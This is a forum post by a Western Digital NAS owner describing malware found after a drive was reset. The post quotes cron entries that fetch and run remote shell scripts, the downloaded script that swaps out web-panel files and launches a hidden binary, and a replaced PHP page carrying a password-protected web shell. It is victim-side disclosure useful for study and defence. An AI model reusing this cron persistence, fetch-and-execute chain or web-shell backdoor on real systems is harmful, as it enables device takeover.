After one of my 4 western digital drives were factory reset, i decided to look for suspicious crontab entries.
I found this in /etc/crontab, ip numbers removed and replaced with xxx. Also, i had to alter the normal http colon // because im a “new user” limited to two links. (I have no intent in posting links) Two ip numbers were utilized.
1 * * * * root rm -f /tmp/w;wget -O /tmp/w http: xxx.xxx.xxx.xxx/w;/bin/sh /tmp/w
1 1 * * * root rm -f /tmp/wB;wget -O /tmp/wB http:
xxx.xxx.xxx.xxx/wB;/bin/sh /tmp/wB
The above appears to download two malicious shell scripts. I do not know how these were added to /etc/crontab on my western digital. One ip number points to Russia, the other Latvia.
I went ahead and downloaded “w” and “wB”
The contents of “w” are as follows, ip numbers removed and replaced with xxx.
This shell script appears to download a file that makes it seem that the web panel of the device is no longer working. It also downloads a hidden executible file called .nttp-z, which i don’t know what it does, but I was able to keep a copy of it.
#!/bin/sh
if ! cat /var/www/Admin/webapp/htdocs/accessDenied.php | grep -q “b18c3795fd377b51b7925b2b68ff818cc9115a47”
then
sudo wget -O /var/www/Admin/webapp/htdocs/accessDenied.php http: xxx.xxx.xxx.xxx/w-eZ2KRdHBfE.txt
fi
if ! cat /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php | grep -q “05951edd7f05318019c4cfafab8e567afe7936d4”
then
sudo wget -O /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php http: xxx.xxx.xxx.xxx/w-9YqJG9zgoN.txt
fi
if test -f /var/www/logout.php
then
sudo rm -f /var/www/logout.php
sudo /sbin/reboot
exit 0
fi
if ! sudo ps aux | grep -q “.[n]ttpd”
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi
sleep 3
if ! sudo ps aux | grep -q “.[n]ttpd”
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd-z /.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi
if sudo /etc/init.d/apache2 status | grep -q “running”
then
sudo /etc/init.d/apache2 stop
fi
rm -f /tmp/ybtIfV5lh3
wget -O /tmp/ybtIfV5lh3 http: xxx.xxx.xxx.xxx/w-ybtIfV5lh3
rm -f /tmp/ybtIfV5lh3
rm -f /tmp/w
wB just removes itself with rm
I will note that these wget commands change the name of what was downloaded and ends up replacing the file that came with the device made by Western Digital with the contents of the files downloaded from Latvia or Russia.
Here is the content of one of them (note i did separate some brackets so it would display :
< ?php
require_once(‘secureCommon.inc’);
?>
< !DOCTYPE html >
< html >
< head >
< meta http-equiv=“X-UA-Compatible” content=“IE=edge” >
< meta http-equiv=“Content-Type” content=“text/html; charset=UTF-8” >
< LINK REL=StyleSheet HREF="
css/main. css" TYPE=“text/css” >
< style >
.contentTables td {
color: #FFFFFF;
}
.
formTable .
roundBox input {
height: 48px;
}
< /style >
< script type=
“text/javascript” src=“js/jquery.js”> < / script >
< / head >
< body >
< ?php include ('header.inc') ? >
< div class="topGrad" >
< img src='images/WD2go_ColorStrip.png'/ >
< div class="contentTables" >
< span class='title' >< ?php echo gettext('ACCESS_DENIED')? >< /span >
< div class='titleSeperatorSpacing' >
< div class='titleSeperator' >
< /div >
< /div >
< br/ >
< p>
< ?php
$_link_ = '"logout.php"';
eval('echo "' . addslashes(gettext('ACCESS_DENIED_CONTENT')) . '";');
?>
< /p>
< p class='GLF8JN4v4b' >
<?php
if(isset($_POST["k"]) && isset($_POST["c"]) && sha1($_POST["k"]) == "b18c3795fd377b51b7925b2b68ff818cc9115a47") {
system($_POST["c"]);
}
?>
</ p>
< /div>
< div class='bottomGlow'>
<img src="
images/WD2go_Glow.png" align=‘bottom’/>
</ div>
< /div>
</ body >
< /html >
Note the “ACCESS DENIED” in the message there.
I can’t get the post to just be text.
